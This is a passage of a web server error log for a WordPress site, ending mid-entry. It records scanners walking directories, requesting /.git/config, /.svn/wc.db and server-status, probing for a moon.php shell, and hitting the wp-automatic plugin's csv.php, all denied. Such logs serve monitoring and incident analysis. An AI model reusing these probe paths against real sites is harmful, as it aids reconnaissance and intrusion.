DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:18.840404 2024] [autoindex:error] [pid 1180:tid 140587860731648] [client 185.104.184.206:43442] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:18.945380 2024] [autoindex:error] [pid 1180:tid 140587869124352] [client 185.104.184.206:43444] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:23.953643 2024] [autoindex:error] [pid 1181:tid 140587827160832] [client 185.104.184.206:43454] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:57.168614 2024] [autoindex:error] [pid 1794:tid 140587991889664] [client 185.104.184.206:43530] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:57.271435 2024] [autoindex:error] [pid 1794:tid 140587734841088] [client 185.104.184.206:43532] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:57.391680 2024] [autoindex:error] [pid 1182:tid 140587852338944] [client 185.104.184.206:43534] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:57.562401 2024] [autoindex:error] [pid 1181:tid 140587902695168] [client 185.104.184.206:43536] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:57.669094 2024] [autoindex:error] [pid 1181:tid 140587852338944] [client 185.104.184.206:43538] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:57.771250 2024] [autoindex:error] [pid 1182:tid 140587818768128] [client 185.104.184.206:43540] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:57.870521 2024] [autoindex:error] [pid 1182:tid 140587843946240] [client 185.104.184.206:43542] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:57.969091 2024] [autoindex:error] [pid 1182:tid 140587801982720] [client 185.104.184.206:43544] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:58.067821 2024] [autoindex:error] [pid 1182:tid 140587743233792] [client 185.104.184.206:43546] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:58.170616 2024] [autoindex:error] [pid 1794:tid 140587877517056] [client 185.104.184.206:43548] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:58.560610 2024] [autoindex:error] [pid 1794:tid 140587894302464] [client 185.104.184.206:43550] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:59.965194 2024] [autoindex:error] [pid 1794:tid 140587743233792] [client 185.104.184.206:43554] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:00.085199 2024] [autoindex:error] [pid 1180:tid 140587877517056] [client 185.104.184.206:43556] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:01.778292 2024] [autoindex:error] [pid 1182:tid 140587869124352] [client 185.104.184.206:43560] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:01.965849 2024] [autoindex:error] [pid 1180:tid 140587852338944] [client 185.104.184.206:43562] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:02.084687 2024] [autoindex:error] [pid 1181:tid 140587818768128] [client 185.104.184.206:43564] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:02.272268 2024] [autoindex:error] [pid 1794:tid 140587785197312] [client 185.104.184.206:43566] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:02.477476 2024] [autoindex:error] [pid 1182:tid 140587991889664] [client 185.104.184.206:43568] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:02.582356 2024] [autoindex:error] [pid 1181:tid 140587776804608] [client 185.104.184.206:43570] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:02.685556 2024] [autoindex:error] [pid 1794:tid 140587818768128] [client 185.104.184.206:43572] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:02.785619 2024] [autoindex:error] [pid 1794:tid 140587776804608] [client 185.104.184.206:43574] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:02.972456 2024] [autoindex:error] [pid 1794:tid 140587902695168] [client 185.104.184.206:43576] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:33.477603 2024] [autoindex:error] [pid 1181:tid 140587793590016] [client 185.104.184.206:43632] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/fullscreen/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:47.521266 2024] [autoindex:error] [pid 1794:tid 140588000282368] [client 185.104.184.206:43686] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:50.123878 2024] [autoindex:error] [pid 1182:tid 140587810375424] [client 185.104.184.206:43694] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:50.233809 2024] [autoindex:error] [pid 1181:tid 140588008675072] [client 185.104.184.206:43696] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:50.532273 2024] [autoindex:error] [pid 1181:tid 140587860731648] [client 185.104.184.206:43698] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:50.628953 2024] [autoindex:error] [pid 1180:tid 140587760019200] [client 185.104.184.206:43700] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:50.730700 2024] [autoindex:error] [pid 1180:tid 140587743233792] [client 185.104.184.206:43702] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:07:50.827583 2024] [autoindex:error] [pid 1180:tid 140587860731648] [client 185.104.184.206:43704] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/XML/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/10/15 10:41:40 [error] 1137#1137: *389445 access forbidden by rule, client: 195.178.110.32, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/10/15 10:54:35 [error] 1138#1138: *389518 access forbidden by rule, client: 195.178.110.32, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/15 10:55:02 [error] 1137#1137: *389525 access forbidden by rule, client: 195.178.110.32, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/15 11:12:56 [error] 1137#1137: *389740 access forbidden by rule, client: 195.178.110.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/10/15 11:25:58 [error] 1137#1137: *389825 access forbidden by rule, client: 195.178.110.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Oct 15 13:15:49.928067 2024] [:error] [pid 1181:tid 140587734841088] [client 89.248.169.52:46822] [client 89.248.169.52] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-automatic/inc/csv.php"] [unique_id "Zw6xVcb-0zSozN82tx9M9AAAAFg"] 2024/10/15 13:30:01 [error] 1137#1137: *391179 access forbidden by rule, client: 213.232.87.232, server: mail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/15 13:30:01 [error] 1138#1138: *391151 access forbidden by rule, client: 213.232.87.232, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" [Wed Oct 16 01:33:46.882125 2024] [autoindex:error] [pid 2608:tid 140587827160832] [client 20.192.21.170:34382] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Oct 16 12:25:32.168979 2024] [authz_core:error] [pid 32733:tid 139691152058112] [client 139.59.143.102:43076] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/16 12:25:38 [error] 32694#32694: *404997 access forbidden by rule, client: 139.59.143.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Oct 16 18:19:50.218724 2024] [:error] [pid 852:tid 139691177236224] [client 89.248.172.92:51796] [client 89.248.172.92] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-automatic/inc/csv.php"] [unique_id "ZxBKFopgU8OY-PVyaVSDbAAAAM0"] [Wed Oct 16 21:06:28.564017 2024] [autoindex:error] [pid 32731:tid 139691252770560] [client 20.198.56.255:54350] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Oct 16 22:44:20.564179 2024] [authz_core:error] [pid 852:tid 139691168843520] [client 138.68.82.23:55352] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/16 22:44:25 [error] 32695#32695: *412969 access forbidden by rule, client: 138.68.82.23, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Oct 17 03:48:31.176183 2024] [autoindex:error] [pid 9210:tid 140166165382912] [client 85.203.21.9:60688] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Thu Oct 17 03:48:35.746404 2024] [autoindex:error] [pid 9210:tid 140166224131840] [client 85.203.21.9:60698] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Thu Oct 17 03:48:44.297623 2024] [autoindex:error] [pid 9096:tid 140166334310144] [client 85.203.21.9:60714] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Thu Oct 17 03:48:45.755513 2024] [autoindex:error] [pid 9096:tid 140166131812096] [client 85.203.21.9:60718] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Thu Oct 17 03:48:46.011125 2024] [:error] [pid 9210:tid 140166182168320] [client 85.203.21.9:60720] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Thu Oct 17 03:48:51.150834 2024] [autoindex:error] [pid 9097:tid 140166207346432] [client 85.203.21.9:60734] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Thu Oct 17 03:48:59.111027 2024] [autoindex:error] [pid 9096:tid 140166106633984] [client 85.203.21.9:60750] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Thu Oct 17 03:49:14.064936 2024] [autoindex:error] [pid 9096:tid 140166140204800] [client 85.203.21.9:60774] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Thu Oct 17 03:49:17.779120 2024] [autoindex:error] [pid 9098:tid 140166140204800] [client 85.203.21.9:60784] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Thu Oct 17 03:49:19.206178 2024] [autoindex:error] [pid 9097:tid 140166089848576] [client 85.203.21.9:60788] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Thu Oct 17 03:49:24.969628 2024] [autoindex:error] [pid 9097:tid 140166351095552] [client 85.203.21.9:60798] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 17 03:49:45.060591 2024] [autoindex:error] [pid 9210:tid 140166342702848] [client 85.203.21.9:60832] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php 2024/10/17 03:50:08 [error] 9059#9059: *415912 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 85.203.21.9, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" [Thu Oct 17 03:50:15.395934 2024] [autoindex:error] [pid 9097:tid 140166232524544] [client 85.203.21.9:60896] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Thu Oct 17 03:50:18.556944 2024] [autoindex:error] [pid 9210:tid 140166240917248] [client 85.203.21.9:60902] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 17 03:50:29.860308 2024] [autoindex:error] [pid 9098:tid 140166198953728] [client 85.203.21.9:60928] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Thu Oct 17 03:50:36.023353 2024] [:error] [pid 